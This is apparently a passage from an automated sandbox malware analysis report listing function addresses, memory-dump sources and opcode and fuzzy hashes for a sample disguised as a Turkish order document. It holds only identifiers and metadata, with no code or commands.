                                                                                        • Opcode Fuzzy Hash: d8682057e91d213f194cb03b34859559c68ae862a9851ba05bca3e9c1d19bc6f
                                                                                        • Instruction Fuzzy Hash: C1F0F976600604AF97248F0AD985C23FBADEBC47B0755C59AE94A4B652C671FC42CEA0
                                                                                        Function 0129D010 Relevance: .0, Instructions: 35COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.3709627597.000000000129D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0129D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_129d000_fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 1e57cc8ca35ead0f38fb055ba765520c389b9e648fc6253cff461c89c57350db
                                                                                        • Instruction ID: 4bd3d5f3e1ff4744fb1f257a3b1bd0dcf799ffbbb72b41ad8445d61862ce5a9b
                                                                                        • Opcode Fuzzy Hash: 1e57cc8ca35ead0f38fb055ba765520c389b9e648fc6253cff461c89c57350db
                                                                                        • Instruction Fuzzy Hash: 3BF03C75104680AFD7258F05C994C22BFB9EF867A07198489E8894B262C675FC42CB60
                                                                                        Function 012F9C2C Relevance: .0, Instructions: 30COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.3709919878.00000000012F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_12f0000_fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: e197ea308ea1e61b9f2f6b4db6d1d2caef455a881da59134960179ead153de31
                                                                                        • Instruction ID: e59dfa1db70f5ac73cd7be2ebcd2f5c5884d86f1ab0fae2c6c3e53a298f05ac4
                                                                                        • Opcode Fuzzy Hash: e197ea308ea1e61b9f2f6b4db6d1d2caef455a881da59134960179ead153de31
                                                                                        • Instruction Fuzzy Hash: D9F05832A101189FDF119F699808BEEBBF9EBC8324F10C03AEA0883214D2714A558B90
                                                                                        Function 012FAF5B Relevance: .0, Instructions: 25COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.3709919878.00000000012F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_12f0000_fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 940e4f660a2354583d55cbbaab8e294480132057c2ca8ad78ae9734804015e5e
                                                                                        • Instruction ID: 979fe7245512956d68bc8cf0ccb3009adb504d7183fa67d95ff96b1e5b4c259e
                                                                                        • Opcode Fuzzy Hash: 940e4f660a2354583d55cbbaab8e294480132057c2ca8ad78ae9734804015e5e
                                                                                        • Instruction Fuzzy Hash: 07F03036644244EFCB01CF94EC40ACDFBB2FF8C321F1841A6EA11AB2A1C2719811CB60
                                                                                        Function 012F28A1 Relevance: .0, Instructions: 22COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.3709919878.00000000012F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_12f0000_fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 4306db73153a91f6da5416927a4b541c191c377cc0e9199849e8191aecdacfb3
                                                                                        • Instruction ID: 4c9d81dae8106ec237e165dc1f871050a823b3d84312682d739125e45c4c7ef3
                                                                                        • Opcode Fuzzy Hash: 4306db73153a91f6da5416927a4b541c191c377cc0e9199849e8191aecdacfb3
                                                                                        • Instruction Fuzzy Hash: 67E02631E643668BCB01E7F49C540FEBF74ADD2222B59869BC06137095EB312219C3A2
                                                                                        Function 012F6739 Relevance: .0, Instructions: 21COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.3709919878.00000000012F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_12f0000_fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 6a2772de491ed85f0025a80e012e053cc659753b378c42e128f0fa6ac28686c9
                                                                                        • Instruction ID: af9e7db3006652ddda9f26a5edab67dd9d62de81ebcc9b5b8afc510e0cd0bea7
                                                                                        • Opcode Fuzzy Hash: 6a2772de491ed85f0025a80e012e053cc659753b378c42e128f0fa6ac28686c9
                                                                                        • Instruction Fuzzy Hash: 03E0C23010C3AA8FD717B73698110623F7AAE82104B048EE0E1404FA7EDA30680F8762
                                                                                        Function 012F28B0 Relevance: .0, Instructions: 19COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.3709919878.00000000012F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_12f0000_fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 037c56d3517c284f5267f6b2a5ee69c1c01939b3d3ae1aacc9ae7932f96072f4
                                                                                        • Instruction ID: 57fcb7b713a7cc3cda5ba3b18cc872e01c18247b14ea8750140405754ef26a03
                                                                                        • Opcode Fuzzy Hash: 037c56d3517c284f5267f6b2a5ee69c1c01939b3d3ae1aacc9ae7932f96072f4
                                                                                        • Instruction Fuzzy Hash: 84D02B31D2032A43CB00E7A5DC044EFFB38EEC1322B918322D41033000FB312658C2E1
                                                                                        Function 012FD6D4 Relevance: .0, Instructions: 16COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.3709919878.00000000012F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_12f0000_fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 772d88053eab8e44927eee198b2bca80224109e9041bff13e2de557de23f778e
                                                                                        • Instruction ID: 5026a5b3022ff88926e91151afdf642175614e2b17d551bb189a148b500d73fc
                                                                                        • Opcode Fuzzy Hash: 772d88053eab8e44927eee198b2bca80224109e9041bff13e2de557de23f778e
                                                                                        • Instruction Fuzzy Hash: 93D04235E1514DCBCF30DFA8E4854DCFBB5EB49322F10942AD929A3251D63454558F11
                                                                                        Function 012FAFAD Relevance: .0, Instructions: 16COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.3709919878.00000000012F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_12f0000_fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 790c6264e75d23cd1606d8538b75f0b1dfbebf3a7ee7860cebe243414ff50b24
                                                                                        • Instruction ID: 8c2490f3c0ece13879361ee2a0ebc15d89c1ad3c0803d6865d012addabb3dd92
                                                                                        • Opcode Fuzzy Hash: 790c6264e75d23cd1606d8538b75f0b1dfbebf3a7ee7860cebe243414ff50b24
                                                                                        • Instruction Fuzzy Hash: 44D0673AB000089FCB149F98E8409DDF776FB98221B448116E915A3264C6319965DB64
                                                                                        Function 012F6748 Relevance: .0, Instructions: 12COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.3709919878.00000000012F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_12f0000_fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 6295f4c1470f514066acd3623e91654b81cc89ce3782fe18eec7b46b4fa11c42
                                                                                        • Instruction ID: fb8f4a6024579c14dda8da95f02c9dd6db15458dc89afc571b137a92b49f1609
                                                                                        • Opcode Fuzzy Hash: 6295f4c1470f514066acd3623e91654b81cc89ce3782fe18eec7b46b4fa11c42
                                                                                        • Instruction Fuzzy Hash: 83C012355003294FDA11F777EC44566373E67D0101B408A10A0050D56DDF74684E4791

                                                                                        Non-executed Functions

                                                                                        Function 012FF979 Relevance: .3, Instructions: 272COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.3709919878.00000000012F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_12f0000_fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 342e97d4c0886a9f0fbd9949073e2c72d15b5e083f2dfffd339145c1a908b9f3
                                                                                        • Instruction ID: 858fd6c9aefa6feabcc0104f04a4a7e93db9730b45079e6d47c9a0d9b6dca741
                                                                                        • Opcode Fuzzy Hash: 342e97d4c0886a9f0fbd9949073e2c72d15b5e083f2dfffd339145c1a908b9f3
                                                                                        • Instruction Fuzzy Hash: 51C1C379E00218CFEB14DFA9C954B9DBBB2BF89300F1081A9D509AB355DB759E85CF10
                                                                                        Function 012FF2D8 Relevance: .2, Instructions: 150COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.3709919878.00000000012F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_12f0000_fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b3a2b6b17d3f2a509a0b077f08a576de54217fbe9f809924939423e0107e5241
                                                                                        • Instruction ID: 130aef72fdf56287ffd2410a0f17bc72f79dd52a28411995260f8a042fc10377
                                                                                        • Opcode Fuzzy Hash: b3a2b6b17d3f2a509a0b077f08a576de54217fbe9f809924939423e0107e5241
                                                                                        • Instruction Fuzzy Hash: 31513575E10209DBEB04EFA9D6947EEFBB2FF89300F148129D600AB298D7759885CF54
                                                                                        Function 012FF4C4 Relevance: .1, Instructions: 146COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.3709919878.00000000012F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_12f0000_fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 5b726505410091f64a39ec0d9e0d1ddbc25c29ea967bc056ee257ca8ed38e3c7
                                                                                        • Instruction ID: ec6787a6dd193041468d46861cffa89ab625eaecf1e3ec68c14d215892186165
                                                                                        • Opcode Fuzzy Hash: 5b726505410091f64a39ec0d9e0d1ddbc25c29ea967bc056ee257ca8ed38e3c7
                                                                                        • Instruction Fuzzy Hash: 5F510276D10209CFDB14EFA8D684BAEFBB2FF58310F148129D615AB294C7759881CF54
                                                                                        Function 012F2A69 Relevance: 5.1, Strings: 4, Instructions: 96COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.3709919878.00000000012F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_12f0000_fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: Xq$Xq$Xq$Xq
                                                                                        • API String ID: 0-3965792415
                                                                                        • Opcode ID: cfcf577020b55786df2b9137163f8389f452205592240622a8ede012d1f65e00
                                                                                        • Instruction ID: 4acffec1cf39b7450cf360a19507c449487601ee4a778f41b6b2061eb44e3936
                                                                                        • Opcode Fuzzy Hash: cfcf577020b55786df2b9137163f8389f452205592240622a8ede012d1f65e00
                                                                                        • Instruction Fuzzy Hash: C4314131D1431E8BEF75CAA9C94136EFAA6AB85210F14407DCB19AB241EB70C985CB92
                                                                                        Function 012F6920 Relevance: 5.0, Strings: 4, Instructions: 49COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.3709919878.00000000012F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012F0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_12f0000_fiyati_teklif 65TBI507_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: \;q$\;q$\;q$\;q
                                                                                        • API String ID: 0-2933265366
                                                                                        • Opcode ID: 828745852934d1e04fcefaa686c9843b1a4286a935844374315b24c07a92c63f
                                                                                        • Instruction ID: bae5fcc3c41860f1881d4978ac0738c067a439f0bd437514bf97fd074e8f7c12
                                                                                        • Opcode Fuzzy Hash: 828745852934d1e04fcefaa686c9843b1a4286a935844374315b24c07a92c63f
                                                                                        • Instruction Fuzzy Hash: 5001F2317301168FD7218A2DC541BA5B7E6FF887A4B29817EEB06CB371DA72EC418740